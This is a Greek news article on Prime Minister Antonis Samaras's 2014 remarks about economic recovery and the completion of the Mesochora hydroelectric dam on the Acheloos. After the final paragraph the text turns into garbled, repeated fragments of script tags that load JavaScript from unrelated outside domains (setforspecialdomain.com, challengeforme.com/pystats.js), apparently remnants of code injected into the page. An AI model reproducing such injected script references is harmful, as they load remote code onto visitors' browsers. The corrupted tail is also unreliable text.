Σαμαράς: «Η Ελλάδα μπαίνει και πάλι σε τροχιά ανάπτυξης»

«Με τις θυσίες του ελληνικού λαού αρχίζει να γίνεται μήνα με το μήνα η Ελλάδα μια χώρα φυσιολογική» υποστήριξε ο πρωθυπουργός Αντ. Σαμαράς, μετά από σύσκεψη στο Μέγαρο Μαξίμου για την απεμπλοκή του υδροηλεκτρικού έργου της Μεσοχώρας.

Ο πρωθυπουργός τόνισε ότι «το 2014 η Ελλάδα για πρώτη φορά, μετά από έξι χρόνια, μπαίνει και πάλι σε τροχιά ανάπτυξης» και πρόσθεσε:«Έχουμε να κάνουμε, όμως, ακόμα πολλά».

«Επενδύουμε σε ένα καλύτερο μέλλον με ανάπτυξη και με θέσεις εργασίας» υποστήριξε ο Αντώνης Σαμαράς. Εξέφρασε ελπίδα ότι «όλοι οι Έλληνες μαζί μπορούμε να τα καταφέρουμε» αλλά και αισιοδοξία, με αφορμή τις ανακοινώσεις της ΕΛ.ΣΤΑΤ. που «διαπιστώνει μείωση της ανεργίας, και σημαντική μείωση επιτέλους, στο δεύτερο τρίμηνο του 2014, με σημαντικότερη τη μείωση της νεανικής ανεργίας».

Ο πρωθυπουργός ανακοίνωσε ότι το υδροηλεκτρικό έργο της Μεσοχώρας προβλέπεται να ολοκληρωθεί σε δυο χρόνια. Ανέφερε ότι για το έργο αυτό έχουν ήδη στο παρελθόν επενδυθεί 283 εκατομμύρια ευρώ και για την ολοκλήρωσή του απαιτούνται άλλα 110. τα οποία είναι διαθέσιμα και θα καλυφθούν από τη ΔΕΗ.

Ο κ. Σαμαράς είπε το συγκεκριμένο έργο ξεκίνησε το 1986 και σταμάτησε το 2001 λόγω δικαστικών εμπλοκών στην εκτροπή του Αχελώου, ότι ο συνολικός χρόνος αποπεράτωσης του υπολογίζεται σε δύο χρόνια, ότι δυστυχώς κάθε χρόνος καθυστέρησης κοστίζει στη ΔΕΗ 25 εκατομμύρια ευρώ και ότι οι συνολικές μέχρι σήμερα απώλειες λόγω καθυστέρησης που είχαμε υπερβαίνουν τα 300 εκατομμύρια ευρώ.

Ο πρωθυπουργός υπογράμμισε ότι από το φράγμα της Μεσοχώρας θα παράγονται ετησίως 360 γιγαβατώρες, ότι το έργο αξιοποιεί τα νερά του Αχελώου για την παραγωγή υδροηλεκτρικής ενέργειας και επαναφέρει τα νερά στη φυσική κοίτη του ποταμού και ότι η παραγόμενη ενέργεια ισοδυναμεί με το 10% της συνολικής παραγόμενης ενέργειας στη χώρα από υδροηλεκτρικά έργα.

«Για να το κατανοήσει κανείς, την αξία εκείνου που λέω, το έργο αυτό θα μπορούσε να καλύψει την ετήσια κατανάλωση ενέργειας ενός νησιού, όπως η Κέρκυρα, ή στο Περιστέρι της Αττικής ή την ετήσια κατανάλωση της Λέσβου και της Χίου μαζί. Αυτή είναι η πρώτη από μια σειρά αναπτυξιακών παρεμβάσεων που ξεκινούν σε ολόκληρη τη χώρα», σημείωσε ο κ. Σαμαράς.

Στη σύσκεψη στο Μέγαρο Μαξίμου συμμετείχαν ο υπουργός Περιβάλλοντος Γ. Μανιάτης, ο αναπληρωτής υπουργός ΠΕΚΑ Ν. Ταγαράς και η κυβερνητική εκπρόσωπος Σοφία Βούλτεψη.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >